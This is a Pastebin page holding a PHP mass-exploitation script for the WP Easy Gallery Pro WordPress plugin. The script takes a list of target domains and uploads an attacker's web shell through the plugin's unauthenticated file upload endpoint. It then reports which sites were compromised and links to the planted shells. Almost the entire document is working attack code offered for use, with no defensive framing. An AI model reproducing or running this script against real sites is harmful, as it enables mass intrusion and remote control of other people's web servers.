KeyDown

WP Easy Gallery Pro Mass exploiter

Jan 2nd, 2016
539
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.84 KB | None | 0 0
  1. <center><br><br>
  2. <font color="lime" size="6">
  3. <b>WP EasyGallery exploiter</b></font>
  4. <br><br>
  5. <form action="" method="POST">
  6. <textarea name="url" style="margin: 0px; width: 626px; height: 236px;">put your target without http://
  7. example :
  8.  
  9. www.site.com
  10. www.site2.com
  11. www.site3.com
  12. www.site4.com
  13. www.site5.com
  14. </textarea><br>
  15. <br><br><input type="submit" class="btn btn-success" value="-=[ GO TO HELL SOON ]=-"/></form>
  16. <br><br>
  17. <?php
  18. #===============================================#
  19. #------------WP Easy Gallery Exploiter----------#
  20. #------------Coded By Synchronizer--------------#
  21. #-Gretz : Stupidc0de - IDCA - Indonesian Coder--#
  22. #===============================================#
  23. if(isset($_POST['url'])) {
  24. function StupidC0de($URL) {
  25. if(!function_exists('curl_init')) {
  26. die ("Curl PHP package not installed");
  27. }
  28. $uploadfile= "ha.php"; #your shell here
  29. $synchronizer = curl_init();
  30. curl_setopt($synchronizer, CURLOPT_POST, true);
  31. curl_setopt($synchronizer, CURLOPT_POSTFIELDS,
  32. array('qqfile'=>"@$uploadfile",'url'=>"./"));
  33. curl_setopt($synchronizer, CURLOPT_RETURNTRANSFER, 1);
  34. curl_setopt($synchronizer, CURLOPT_URL, $URL);
  35. curl_setopt($synchronizer, CURLOPT_HEADER, false);
  36. $response = curl_exec($synchronizer);
  37. return $response;
  38. }
  39. $textarea = htmlspecialchars(trim($_POST['url']));
  40. $j = explode("\r\n",$textarea);
  41. foreach($j as $sync){
  42. $n = StupidC0de($sync."/wp-content/plugins/wp-easy-gallery-pro/admin/php.php");
  43. $b = str_replace('{"success":true,"fileName":"\/\/\/', "", $n);
  44. $c = str_replace('"}', "", $b);
  45. $d = $sync."/wp-content/uploads/".$c;
  46. if(preg_match('/{"success":true,"/',$n)==1) {
  47. echo "<center><a href='http://$d' target='_blank'><font color=lime>$d</font></a> - <font color=green><b>SUKSES</b></font></center><br>";
  48. } else {
  49. echo "<center>".$sync."<font color=red><b> - FAILED !</b></font></center><br>";
  50. }
  51. }
  52. }
  53. ?>
Advertisement
Add Comment
Please, Sign In to add comment